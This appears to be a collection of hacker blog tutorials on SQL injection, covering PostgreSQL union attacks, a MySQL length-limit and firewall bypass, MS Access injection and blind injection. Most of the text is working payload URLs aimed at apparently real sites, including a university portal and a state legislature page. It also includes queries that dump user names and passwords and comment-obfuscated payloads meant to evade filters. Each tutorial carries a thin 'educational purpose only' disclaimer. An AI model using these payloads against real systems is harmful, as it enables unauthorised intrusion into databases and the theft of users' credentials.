POSTGRE SQL Injection

NOTE:This tutorial is for educational purpose only .

well u can varify this vulnerability (as said by Net_Spy a good sql injector)
by this error
Errors
MYSQL with MYSQL
or
MS SQL with SQL
or
ORACLE with ORA
or
MS ACCESS with Jet
or
Warning: pg_exec () [function.pg-exec]

but in our case the page is blank (i think the worst case)
well some basics for it also

|| is concatenation operator in POSTGRESQL (jux like Oracle)
we can use LIMIT function here but with some addition i.e. OFFSET if results are displayed one by one

Rest is same i think jux like mysql

now column count..
column count is same like mysql, mssql and oracle
with order by clause

comments in POSTGRESQL
-- This is a standard SQL comment
/* this is
 * multiline comments syntax
 */

CASTING in POSTGRESQL
CAST ( 'string' AS type )

now lets inject the site
with order by clause we came to know that there are 8 columns in select statement before union

okay now union select * columns
here we use null like MSSQL or Oracle because we dont know the data type.. unlike php these are typed
so one by one put a string in place of null and u will see the string in web page if the column data type is nvarchar/nchar/char/varchar

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,'Ch3rnoby1 Black Hat',null,null,null,null,null,null--+

now for version()
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,version(),null,null,null,null,null,null--+

for database_name

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database--+

if this is showing only one
than
we can use limit function
like this

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database LIMIT 1 OFFSET 1--+
now jux increase the limit and find all other dbs
offset function show i table at a time
eg
limit 1 offset 1 =====> one database
limit 2 offset 2 =====> one database(next to first)

or

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,datname,null,null,null,null,null,null from pg_database LIMIT 1--+
and same increase the limit to see other databases

now enumerating table_name
this will show all tables in all databases

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,table_name,null,null,null,null,null,null from information_schema.tables--+

to see only tables of current database we will use

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,table_name,null,null,null,null,null,null from information_schema.tables where table_schema=current_schema()--+

now column name
this will show all columns of all tables of all databases

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,column_name,null,null,null,null,null,null from information_schema.columns--+


to see only specific table columns we will use

http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,column_name,null,null,null,null,null,null from information_schema.columns where table_name='portal_user'--+
now see if 'table_name' dont work than u need to use
CHR(table_name) and this is Oracle CHR()
u cannot use hex value in postgresql query anywhere..(i've tested well u can check ur self too..)


now dumping data..
this is same like Oracle..
http://www.jaduniv.edu.in/view_department.php?deptid=66' UNION SELECT null,(user_name||'::::'||user_password),null,null,null,null,null,null from portal_user--+


for reference
http://www.postgresql.org/docs/8.0/static/sql-syntax.html

Tutorial By Pk Injector

Read full post »

SQL Injection 1024 Bypass

NOTE: This tutorial is for educational Purpose only.

1024 Character limit ByPass Classic Syntax

(select (@y) from (select (@y:=0x00), (select (0) from(information_schema.columns) where (table_schema!='information_schema') and (0x00) in (@y:=concat(@y,'<br>',table_schema,'-->',table_name,'-->',column_name))))x)

without simple firewall when magic quote off

(select (@y) from (select (@y:=0x00), (select (0) from(information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@y:=concat(@y,0x3c62723e,table_schema,0x3a3a3a,table_name,0x3a3a3a,column_name))))x)

with simple firewall when magic quote off

(/*!00000select*/ (@y) /*!from*/ (/*!00000select*/ (@y:=0x00), (/*!00000select*/ (0) /*!from*/(information_schema./**/columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@y:=concat(@y,0x3c62723e,table_schema,0x3a3a3a,/*!table_name*/,0x3a3a3a,/*!column_name*/))))x)

dump whole table without simple firewall

(select(@) from(select(@:=0x00) ,(select (@) from(dbname.table_name)where(@) in (@:=concat (0x20,@, username ,0x203a3a20, name ,0x203a3a20, email_id ,0x203a3a20, hash_link ,0x3c62723e))))a)

dump whole table with simple firewall

(/*!00000select*/(@) /*!from*/(/*!00000select*/(@:=0x00) ,(/*!00000select*/ (@) /*!from*/(dbname.table_name)where(@) in (@:=concat (0x20,@, column1 ,0x203a3a20, column2 ,0x203a3a20, column3 ,0x203a3a20, column4 ,0x203a3a20, column5,0x3c62723e))))a)

R=Tutorial By Pk Injector with Thnx to MakMan

Read full post »

MSAccess Sqli

NOTE:This Tutorial is for educational purpose only.
Quick Guide for MS Access Injection
Greetings to all,

Today Im gonna discuss MS Access Injection which is rare really n wiered too Smile . Hardly some web still using it.

Introduction

MS Access is commonly thought of as the little brother of Database engines, and not a lot of material has been published about methods used for exploiting it during a penetration test.MS Jet is often mistakenly thought of as being another name for MS Access, when in fact it is a database engine that is shipped as part of the Windows OS. MS Jet was however the core database engine used by MS Access up to version 2007. Since version 2007, MS Access has included a separate updated engine known as Access Connectivity Engine. Although MS Jet is not as complex as more advanced databases such as SQL server or Oracle, it is still commonly used by smaller web sites that want quick and easy database storage.

Default Tables Used In Access

Note: Those table name having * infront of their name, means it can be use in query.

Access 97
MSysAccessObjects *
MSysACEs
MSysModules
MSysModules2 *
MSysObjects
MSysQueries
MSysRelationship

Access 2000
MSysAccessObjects *
MSysAccessXML *
MSysACEs
MSysObjects
MSysQueries
MSysRelationships


Access 2002-2003
MSysAccessStorage *
MSysAccessXML *
MSysACEs
MSysObjects
MSysQueries
MSysRelationships


Access 2007
MSysAccessStorage *
MSysACEs
MSysComplexColumns
MSysComplexType_Attachment
MSysComplexType_Decimal
MSysComplexType_GUID
MSysComplexType_IEEEDouble
MSysComplexType_IEEESingle
MSysComplexType_Long
MSysComplexType_Short
MSysComplexType_Text
MSysComplexType_UnsignedByte
MSysNavPaneGroupCategories *
MSysNavPaneGroups *
MSysNavPaneGroupToObjects *
MSysNavPaneObjectIDs *
SysObjects
MSysQueries
MSysRelationships


As we can see each version having some new default tables and each of them work differently .But ms access injection is real pain Confused it does not contails schema , when we say schema that's mean we have to guess each table and column . Access also does not support.ERROR BASED INJECTION nor having global veriable like @@version . So we can guess the version by default table Smile .

Column Enumeration and Union

We will use the # for commenting the rest of the query instead of -- or /* .

Step-1

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103

Above site is vuln to sql injection let's see what error we get ?

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103'

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
  [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'DISTRICTNUMBER = 103''.
   /h_reps/members.asp, line 16

Step-2

Using order by to get columns.

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 1# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 2# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 3# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 4# <== No error
we will do increament of 1 till we get an error :
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 35# <== Error

That's mean we have total number of columns are 34 . Let's proceed with union now.

If we are not sure about data type we can proceed with Null instead of integer .

Step-3

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from MSysAccessObjects#

We have used default table name of MS Access 2000 see the list above.
Now on your screen you can see some numbers right under the page contents like 17 19 20 ... .

Most common tables are below
users
admin
administrator
login
customers
user
members
member
customer

Step-4: Getting table

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from members#

Page load normaly that's mean we have found a valid table now let's enumerate columns .

Step-5 : Getting Columns

We will use GROUP BY and Having for example

GROUP BY tablename.column1 having 1=1#
GROUP BY tablename.coumn1,column2 having 1=1#
GROUP BY tablename.column1,column2,coumn(n).... having 1=1#

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from members group by members.id having 1=1#


Page will load with out any error now lets put "id" in place of number of column we see on our screen

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,id,18,19,20,21,22,23,24,25,26,27,28,29,30?,31,32,33,34 from members#


we have got the following data Smile .
Code:
COMMITTEE ASSIGNMENTS
102

Now let's get next column

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,
  11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id,now having 1=1#


Page will load with out any error now lets put "now" in place of number of column we see on our screen

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,now,18,19,20,21,22,23,24,25,26,27,28,29,3?0,31,32,33,34 from members#


we have got the following data Smile .
Code:
COMMITTEE ASSIGNMENTS
4/15/2011 3:06:13 PM


Thats All guys Smile .

Special thanks to : Renorobert , N3t.Crack3R , Sho0ter

If you like this do post your comments regarding this Smile .

Tutorial By NET_Spy with Thnx to PK Injector 

Read full post »

Bl!nd Sql Injection

NOTE:This tutorial is for education purpose to understand the sqli Blind type.What is Blind SQLi 
Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established
Blind SQLi Tutorial 



Let’s Start…………                
Suppose That You want to Hack This website with Blind SQLi
http://site.com/index.php?id=5
when we execute this, we see some page and articles on that page, pictures
etc…
then when we want to test it for blind sql injection attack
http://www.site.com/index.php?id=5 and 1=1 <--- this is always true
and the page loads normally, that's ok.
now the real test
http://www.site.com/index.php?id=5 and 1=2 <--- this is false
so if some text, picture or some content is missing on returned page then
that site is vulrnable to blind sql injection.
1) Get the MySQL version
to get the version in blind attack we use substring
i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5
2) Test if subselect works
when select don't work then we use subselect
i.e
http://www.site.com/index.php?id=5 and (select 1)=1
if page loads normally then subselects work. then we gonna see if we have access to mysql.user
i.e
http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can
pull some password usign load_file() function and OUTFILE.
3). Check table and column names
This is part when guessing is the best friend :) i.e.
http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect
returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users
exits.
if you get FALSE (some article missing), just change table name until you
guess the right one :)
let's say that we have found that table name is users, now what we need is
column name.
the same as table name, we start guessing. Like i said before try the
common names for columns.
i.e
http://www.site.com/index.php?id=5 and (select substring(concat(1,
password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get
false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first
character (,1,1)
4). Pull data from database
we found table users i columns username password so we gonna pull
characters from that.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii()
converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
so the first character in username is char(99). Using the ascii converter
we know that char(99) is letter 'c'.
then let's check the second character.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),2,1))>99
Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it
returns the second character, 1 character in lenght)
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>104
TRUE, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!
we know that the second character is char(105) and that is 'i'. We have
'ci' so far
so keep incrementing until you get the end. (when >0 returns false we know
that we have reach the end).
There are some tools for Blind SQL Injection, i think sqlmap is the best
Regards.
Gujjar(pcp)
Credit goes to real Other 

Read full post »